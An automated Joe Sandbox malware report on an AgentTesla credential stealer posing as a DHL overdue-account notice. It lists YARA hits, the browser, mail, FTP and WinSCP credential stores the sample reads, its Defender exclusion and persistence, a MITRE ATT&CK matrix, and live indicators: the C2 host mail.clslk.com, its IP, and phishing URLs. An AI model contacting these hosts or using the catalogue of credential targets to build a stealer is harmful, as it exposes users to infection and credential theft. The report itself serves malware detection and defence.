                      Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.EnterpriseServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.EnterpriseServices.Wrapper.dll VolumeInformation
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe VolumeInformation
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exeQueries volume information: C:\Users\user\AppData\Roaming\boqXv\boqXv.exe VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.EnterpriseServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.EnterpriseServices.dll VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.EnterpriseServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.EnterpriseServices.Wrapper.dll VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.EnterpriseServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.EnterpriseServices.Wrapper.dll VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.EnterpriseServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.EnterpriseServices.Wrapper.dll VolumeInformation
                      Source: C:\Users\user\Desktop\DHL - OVERDUE ACCOUNT NOTICE - 1301669350.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
                      Source: Amcache.hve.12.drBinary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe
                      Source: Amcache.hve.12.drBinary or memory string: msmpeng.exe
                      Source: Amcache.hve.12.drBinary or memory string: c:\program files\windows defender\msmpeng.exe
                      Source: Amcache.hve.12.drBinary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23090.2008-0\msmpeng.exe
                      Source: Amcache.hve.12.drBinary or memory string: MsMpEng.exe

                      Stealing of Sensitive Information

                      barindex
                      Source: Yara matchFile source: 9.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 1.2.DHL - OVERDUE ACCOUNT NOTICE - 1301669350.exe.46a9af0.5.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 1.2.DHL - OVERDUE ACCOUNT NOTICE - 1301669350.exe.466ead0.2.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 1.2.DHL - OVERDUE ACCOUNT NOTICE - 1301669350.exe.46a9af0.5.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 1.2.DHL - OVERDUE ACCOUNT NOTICE - 1301669350.exe.466ead0.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000009.00000002.2413879455.0000000002FA2000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000009.00000002.2408863258.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000009.00000002.2413879455.0000000002FAA000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000014.00000002.3497093745.0000000002C8F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000014.00000002.3497093745.0000000002C97000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000009.00000002.2413879455.0000000002F51000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000014.00000002.3497093745.0000000002C2C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000001.00000002.2353913822.0000000004467000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: DHL - OVERDUE ACCOUNT NOTICE - 1301669350.exe PID: 6532, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: RegSvcs.exe PID: 5560, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: RegSvcs.exe PID: 5656, type: MEMORYSTR
                      Source: Yara matchFile source: 1.2.DHL - OVERDUE ACCOUNT NOTICE - 1301669350.exe.71f0000.6.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 1.2.DHL - OVERDUE ACCOUNT NOTICE - 1301669350.exe.71f0000.6.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 1.2.DHL - OVERDUE ACCOUNT NOTICE - 1301669350.exe.3a79970.3.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 1.2.DHL - OVERDUE ACCOUNT NOTICE - 1301669350.exe.3a79970.3.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000001.00000002.2353913822.0000000003A79000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000001.00000002.2359343012.00000000071F0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\SessionsJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Roaming\NETGATE Technologies\BlackHawk\profiles.ini
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Roaming\8pecxstudios\Cyberfox\profiles.ini
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\FTP Navigator\Ftplist.txt
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.iniJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.iniJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\ProfilesJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeKey opened: HKEY_CURRENT_USER\Software\IncrediMail\IdentitiesJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeKey opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities
                      Source: Yara matchFile source: 9.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 1.2.DHL - OVERDUE ACCOUNT NOTICE - 1301669350.exe.46a9af0.5.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 1.2.DHL - OVERDUE ACCOUNT NOTICE - 1301669350.exe.466ead0.2.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 1.2.DHL - OVERDUE ACCOUNT NOTICE - 1301669350.exe.46a9af0.5.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 1.2.DHL - OVERDUE ACCOUNT NOTICE - 1301669350.exe.466ead0.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000009.00000002.2408863258.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000009.00000002.2413879455.0000000002F51000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000014.00000002.3497093745.0000000002C2C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000001.00000002.2353913822.0000000004467000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: DHL - OVERDUE ACCOUNT NOTICE - 1301669350.exe PID: 6532, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: RegSvcs.exe PID: 5560, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: RegSvcs.exe PID: 5656, type: MEMORYSTR

                      Remote Access Functionality

                      barindex
                      Source: Yara matchFile source: 9.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 1.2.DHL - OVERDUE ACCOUNT NOTICE - 1301669350.exe.46a9af0.5.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 1.2.DHL - OVERDUE ACCOUNT NOTICE - 1301669350.exe.466ead0.2.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 1.2.DHL - OVERDUE ACCOUNT NOTICE - 1301669350.exe.46a9af0.5.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 1.2.DHL - OVERDUE ACCOUNT NOTICE - 1301669350.exe.466ead0.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000009.00000002.2413879455.0000000002FA2000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000009.00000002.2408863258.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000009.00000002.2413879455.0000000002FAA000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000014.00000002.3497093745.0000000002C8F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000014.00000002.3497093745.0000000002C97000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000009.00000002.2413879455.0000000002F51000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000014.00000002.3497093745.0000000002C2C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000001.00000002.2353913822.0000000004467000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: DHL - OVERDUE ACCOUNT NOTICE - 1301669350.exe PID: 6532, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: RegSvcs.exe PID: 5560, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: RegSvcs.exe PID: 5656, type: MEMORYSTR
                      Source: Yara matchFile source: 1.2.DHL - OVERDUE ACCOUNT NOTICE - 1301669350.exe.71f0000.6.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 1.2.DHL - OVERDUE ACCOUNT NOTICE - 1301669350.exe.71f0000.6.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 1.2.DHL - OVERDUE ACCOUNT NOTICE - 1301669350.exe.3a79970.3.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 1.2.DHL - OVERDUE ACCOUNT NOTICE - 1301669350.exe.3a79970.3.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000001.00000002.2353913822.0000000003A79000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000001.00000002.2359343012.00000000071F0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                      ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                      Gather Victim Identity InformationAcquire InfrastructureValid Accounts121
                      Windows Management Instrumentation
                      1
                      DLL Side-Loading
                      1
                      DLL Side-Loading
                      11
                      Disable or Modify Tools
                      2
                      OS Credential Dumping
                      1
                      File and Directory Discovery
                      Remote Services11
                      Archive Collected Data
                      1
                      Encrypted Channel
                      Exfiltration Over Other Network MediumAbuse Accessibility Features
                      CredentialsDomainsDefault Accounts1
                      Scheduled Task/Job
                      1
                      Scheduled Task/Job
                      311
                      Process Injection
                      1
                      Deobfuscate/Decode Files or Information
                      1
                      Input Capture
                      24
                      System Information Discovery
                      Remote Desktop Protocol2
                      Data from Local System
                      1
                      Non-Standard Port
                      Exfiltration Over BluetoothNetwork Denial of Service
                      Email AddressesDNS ServerDomain AccountsAt1
                      Registry Run Keys / Startup Folder
                      1
                      Scheduled Task/Job
                      2
                      Obfuscated Files or Information
                      1
                      Credentials in Registry
                      231
                      Security Software Discovery
                      SMB/Windows Admin Shares1
                      Email Collection
                      1
                      Non-Application Layer Protocol
                      Automated ExfiltrationData Encrypted for Impact
                      Employee NamesVirtual Private ServerLocal AccountsCronLogin Hook1
                      Registry Run Keys / Startup Folder
                      22
                      Software Packing
                      NTDS1
                      Process Discovery
                      Distributed Component Object Model1
                      Input Capture
                      11
                      Application Layer Protocol
                      Traffic DuplicationData Destruction
                      Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
                      Timestomp
                      LSA Secrets161
                      Virtualization/Sandbox Evasion
                      SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
                      Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
                      DLL Side-Loading
                      Cached Domain Credentials1
                      Application Window Discovery
                      VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                      DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
                      Masquerading
                      DCSyncRemote System DiscoveryWindows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                      Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job161
                      Virtualization/Sandbox Evasion
                      Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                      Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt311
                      Process Injection
                      /etc/passwd and /etc/shadowNetwork SniffingDirect Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
                      IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCron1
                      Hidden Files and Directories
                      Network SniffingNetwork Service DiscoveryShared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement
                      Hide Legend

                      Legend:

                      • Process
                      • Signature
                      • Created File
                      • DNS/IP Info
                      • Is Dropped
                      • Is Windows Process
                      • Number of created Registry Values
                      • Number of created Files
                      • Visual Basic
                      • Delphi
                      • Java
                      • .Net C# or VB.NET
                      • C, C++ or other language
                      • Is malicious
                      • Internet
                      behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1432022 Sample: DHL - OVERDUE ACCOUNT NOTIC... Startdate: 26/04/2024 Architecture: WINDOWS Score: 100 55 mail.clslk.com 2->55 59 Snort IDS alert for network traffic 2->59 61 Found malware configuration 2->61 63 Malicious sample detected (through community Yara rule) 2->63 65 16 other signatures 2->65 8 DHL - OVERDUE ACCOUNT NOTICE - 1301669350.exe 7 2->8         started        12 LJAGvecDW.exe 2->12         started        14 boqXv.exe 2->14         started        16 boqXv.exe 2->16         started        signatures3 process4 file5 51 C:\Users\user\AppData\Roaming\LJAGvecDW.exe, PE32 8->51 dropped 53 C:\Users\user\AppData\Local\...\tmp87CB.tmp, XML 8->53 dropped 81 Writes to foreign memory regions 8->81 83 Allocates memory in foreign processes 8->83 85 Adds a directory exclusion to Windows Defender 8->85 87 Injects a PE file into a foreign processes 8->87 18 RegSvcs.exe 1 4 8->18         started        23 powershell.exe 23 8->23         started        25 powershell.exe 23 8->25         started        37 2 other processes 8->37 89 Antivirus detection for dropped file 12->89 91 Multi AV Scanner detection for dropped file 12->91 93 Machine Learning detection for dropped file 12->93 27 RegSvcs.exe 12->27         started        29 schtasks.exe 12->29         started        31 WerFault.exe 12->31         started        33 conhost.exe 14->33         started        35 conhost.exe 16->35         started        signatures6 process7 dnsIp8 57 mail.clslk.com 50.87.253.239, 49721, 49731, 587 UNIFIEDLAYER-AS-1US United States 18->57 49 C:\Users\user\AppData\Roaming\...\boqXv.exe, PE32 18->49 dropped 67 Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines) 18->67 69 Hides that the sample has been downloaded from the Internet (zone.identifier) 18->69 71 Loading BitLocker PowerShell Module 23->71 39 conhost.exe 23->39         started        41 WmiPrvSE.exe 23->41         started        43 conhost.exe 25->43         started        73 Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc) 27->73 75 Tries to steal Mail credentials (via file / registry access) 27->75 77 Tries to harvest and steal ftp login credentials 27->77 79 Tries to harvest and steal browser information (history, passwords, etc) 27->79 45 conhost.exe 29->45         started        47 conhost.exe 37->47         started        file9 signatures10 process11

                      This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                      windows-stand
                      SourceDetectionScannerLabelLink
                      DHL - OVERDUE ACCOUNT NOTICE - 1301669350.exe51%VirustotalBrowse
                      DHL - OVERDUE ACCOUNT NOTICE - 1301669350.exe45%ReversingLabsByteCode-MSIL.Trojan.AgentTesla
                      DHL - OVERDUE ACCOUNT NOTICE - 1301669350.exe100%AviraHEUR/AGEN.1305452
                      DHL - OVERDUE ACCOUNT NOTICE - 1301669350.exe100%Joe Sandbox ML
                      SourceDetectionScannerLabelLink
                      C:\Users\user\AppData\Roaming\LJAGvecDW.exe100%AviraHEUR/AGEN.1305452
                      C:\Users\user\AppData\Roaming\LJAGvecDW.exe100%Joe Sandbox ML
                      C:\Users\user\AppData\Roaming\LJAGvecDW.exe45%ReversingLabsByteCode-MSIL.Trojan.AgentTesla
                      C:\Users\user\AppData\Roaming\LJAGvecDW.exe51%VirustotalBrowse
                      C:\Users\user\AppData\Roaming\boqXv\boqXv.exe0%ReversingLabs
                      C:\Users\user\AppData\Roaming\boqXv\boqXv.exe0%VirustotalBrowse
                      No Antivirus matches
                      SourceDetectionScannerLabelLink
                      mail.clslk.com2%VirustotalBrowse
                      SourceDetectionScannerLabelLink
                      http://mail.clslk.com100%Avira URL Cloudmalware
                      http://mail.clslk.com2%VirustotalBrowse
                      NameIPActiveMaliciousAntivirus DetectionReputation
                      mail.clslk.com
                      50.87.253.239
                      truetrueunknown
                      NameSourceMaliciousAntivirus DetectionReputation
                      http://upx.sf.netAmcache.hve.12.drfalse
                        high
                        http://mail.clslk.comRegSvcs.exe, 00000009.00000002.2413879455.0000000002FAA000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000014.00000002.3497093745.0000000002C97000.00000004.00000800.00020000.00000000.sdmpfalse
                        • 2%, Virustotal, Browse
                        • Avira URL Cloud: malware
                        unknown
                        https://account.dyn.com/DHL - OVERDUE ACCOUNT NOTICE - 1301669350.exe, 00000001.00000002.2353913822.0000000004467000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000009.00000002.2408863258.0000000000402000.00000040.00000400.00020000.00000000.sdmpfalse
                          high
                          http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameDHL - OVERDUE ACCOUNT NOTICE - 1301669350.exe, 00000001.00000002.2353195129.0000000002AED000.00000004.00000800.00020000.00000000.sdmp, LJAGvecDW.exe, 0000000D.00000002.2446819021.000000000279D000.00000004.00000800.00020000.00000000.sdmpfalse
                            high
                            • No. of IPs < 25%
                            • 25% < No. of IPs < 50%
                            • 50% < No. of IPs < 75%
                            • 75% < No. of IPs
                            IPDomainCountryFlagASNASN NameMalicious
                            50.87.253.239
                            mail.clslk.comUnited States
                            46606UNIFIEDLAYER-AS-1UStrue
                            Joe Sandbox version:40.0.0 Tourmaline
                            Analysis ID:1432022
                            Start date and time:2024-04-26 10:05:13 +02:00
                            Joe Sandbox product:CloudBasic
                            Overall analysis duration:0h 9m 33s
                            Hypervisor based Inspection enabled:false
                            Report type:full
                            Cookbook file name:default.jbs
                            Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                            Number of analysed new started processes analysed:28
                            Number of new started drivers analysed:0
                            Number of existing processes analysed:0
                            Number of existing drivers analysed:0
                            Number of injected processes analysed:0
                            Technologies:
                            • HCA enabled
                            • EGA enabled
                            • AMSI enabled
                            Analysis Mode:default
                            Analysis stop reason:Timeout
                            Sample name:DHL - OVERDUE ACCOUNT NOTICE - 1301669350.exe
                            Detection:MAL
                            Classification:mal100.troj.spyw.evad.winEXE@25/28@1/1
                            EGA Information:
                            • Successful, ratio: 66.7%
                            HCA Information:
                            • Successful, ratio: 98%
                            • Number of executed functions: 252
                            • Number of non-executed functions: 23
                            Cookbook Comments:
                            • Found application associated with file extension: .exe
                            • Exclude process from analysis (whitelisted): dllhost.exe, WerFault.exe, WMIADAP.exe, SIHClient.exe, svchost.exe
                            • Excluded IPs from analysis (whitelisted): 20.189.173.20, 52.182.143.212
                            • Excluded domains from analysis (whitelisted): client.wns.windows.com, fs.microsoft.com, ocsp.digicert.com, onedsblobprdcus15.centralus.cloudapp.azure.com, login.live.com, slscr.update.microsoft.com, blobcollector.events.data.trafficmanager.net, onedsblobprdwus15.westus.cloudapp.azure.com, ctldl.windowsupdate.com, umwatson.events.data.microsoft.com, fe3cr.delivery.mp.microsoft.com
                            • Execution Graph export aborted for target boqXv.exe, PID 2360 because it is empty
                            • Execution Graph export aborted for target boqXv.exe, PID 5264 because it is empty
                            • Not all processes where analyzed, report is missing behavior information
                            • Report size exceeded maximum capacity and may have missing behavior information.
                            • Report size getting too big, too many NtCreateKey calls found.
                            • Report size getting too big, too many NtOpenKeyEx calls found.
                            • Report size getting too big, too many NtProtectVirtualMemory calls found.
                            • Report size getting too big, too many NtQueryValueKey calls found.
                            • Report size getting too big, too many NtReadVirtualMemory calls found.
                            • Report size getting too big, too many NtSetInformationFile calls found.
                            TimeTypeDescription
                            10:06:19API Interceptor1x Sleep call for process: DHL - OVERDUE ACCOUNT NOTICE - 1301669350.exe modified
                            10:06:23API Interceptor40x Sleep call for process: powershell.exe modified
                            10:06:24Task SchedulerRun new task: LJAGvecDW path: C:\Users\user\AppData\Roaming\LJAGvecDW.exe
                            10:06:25API Interceptor37x Sleep call for process: RegSvcs.exe modified
                            10:06:25AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run boqXv C:\Users\user\AppData\Roaming\boqXv\boqXv.exe
                            10:06:27API Interceptor1x Sleep call for process: LJAGvecDW.exe modified
                            10:06:29API Interceptor2x Sleep call for process: WerFault.exe modified
                            10:06:33AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run boqXv C:\Users\user\AppData\Roaming\boqXv\boqXv.exe
                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                            50.87.253.2392UHM2qaBWc.exeGet hashmaliciousFormBookBrowse
                            • www.nzhorrorfan.com/g22y/?7nr=UlSpjty&DVo=duzldioexDDlB4DMbPZnZ3oFioc8ODg8sXLpFdRenDAB6KcB0Wl7OltmwVmSQUiOOLKB
                            SD 1476187 85250296 MV ORIENT GLORY.xlsxGet hashmaliciousFormBookBrowse
                            • www.180cliniconline.com/aky/?pL08=Cv0e5xcycHu/jj9c+Bm6TZuJ2sSpc7+qQNv7jFIv1TirEUN5Q8TsPaCd/DQVlMEaxK1KhA==&PJ=zXd8_XtXO
                            yaQjVEGNEb.exeGet hashmaliciousFormBookBrowse
                            • www.180cliniconline.com/aky/?3fcl7=Cv0e5xc3cAu7jzxQ8Bm6TZuJ2sSpc7+qQN3r/GUuxziqElh/XsCgZe6f8m8p+swp+Lg6&9r4LE=B8xX4PgPJ2gdf
                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                            mail.clslk.comDHL_1003671162.exeGet hashmaliciousAgentTeslaBrowse
                            • 50.87.253.239
                            I-IN-6757165752-DEL983527_20240416074318.exeGet hashmaliciousAgentTeslaBrowse
                            • 50.87.253.239
                            SecuriteInfo.com.PWSX-gen.32561.14552.exeGet hashmaliciousAgentTeslaBrowse
                            • 50.87.253.239
                            DN.exeGet hashmaliciousAgentTeslaBrowse
                            • 50.87.253.239
                            SecuriteInfo.com.Win32.TrojanX-gen.32302.18886.exeGet hashmaliciousAgentTeslaBrowse
                            • 50.87.253.239
                            SecuriteInfo.com.Trojan.MulDropNET.68.28054.3825.exeGet hashmaliciousAgentTeslaBrowse
                            • 50.87.253.239
                            Consignment 5059367692.exeGet hashmaliciousAgentTeslaBrowse
                            • 50.87.253.239
                            DHL - 1ST PAYMENT REMINDER - 1003671162.exeGet hashmaliciousAgentTeslaBrowse
                            • 50.87.253.239
                            5059367692.exeGet hashmaliciousAgentTeslaBrowse
                            • 50.87.253.239
                            5059367692.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                            • 50.87.253.239
                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                            UNIFIEDLAYER-AS-1USSOA FOR APR 2024 PDF.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                            • 50.87.195.61
                            INQ No. HDPE-16-GM-00- PI-INQ-3001.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                            • 162.240.81.18
                            DOC-Zcns1G_.htmlGet hashmaliciousHTMLPhisherBrowse
                            • 192.232.216.145
                            DOC-Zcns1G_.htmlGet hashmaliciousHTMLPhisherBrowse
                            • 192.232.216.145
                            DOC-Zcns1G_.htmlGet hashmaliciousHTMLPhisherBrowse
                            • 192.232.216.145
                            https://www.bing.com/ck/a?!&&p=8c604c2d3901cb1eJmltdHM9MTcxMjc5MzYwMCZpZ3VpZD0wODdjNjgyYy00N2ZlLTYyOGQtMzA1ZC03YmVmNDY5NTYzNjUmaW5zaWQ9NTE2MQ&ptn=3&ver=2&hsh=3&fclid=087c682c-47fe-628d-305d-7bef46956365&u=a1aHR0cHM6Ly9rZWljb3NlY3VyaXR5LmNvbS5teC8&ntb=1Get hashmaliciousUnknownBrowse
                            • 192.185.214.24
                            https://web.lehighvalleychamber.org/cwt/external/wcpages/referral.aspx?ReferralType=W&ProfileID=5337&ListingID=4065&CategoryID=74&SubCategoryID=0&url=//sanemedia.ca/owaow/yjyo8q/bWFyaWEud29qY2llY2hvd3NraUBjby5tb25tb3V0aC5uai51cw==Get hashmaliciousHTMLPhisherBrowse
                            • 162.241.120.242
                            https://web.lehighvalleychamber.org/cwt/external/wcpages/referral.aspx?ReferralType=W&ProfileID=5337&ListingID=4065&CategoryID=74&SubCategoryID=0&url=//sanemedia.ca/owaow/yjyo8q/bWFyaWEud29qY2llY2hvd3NraUBjby5tb25tb3V0aC5uai51cw==Get hashmaliciousHTMLPhisherBrowse
                            • 162.241.120.242
                            https://web.lehighvalleychamber.org/cwt/external/wcpages/referral.aspx?ReferralType=W&ProfileID=5337&ListingID=4065&CategoryID=74&SubCategoryID=0&url=//sanemedia.ca/owaow/o76fri/enpmZG9tbF9zdXBlcnZpc29yMXN0X2Fzc2lzdGFudEBmZC5vcmc=Get hashmaliciousHTMLPhisherBrowse
                            • 162.241.120.242
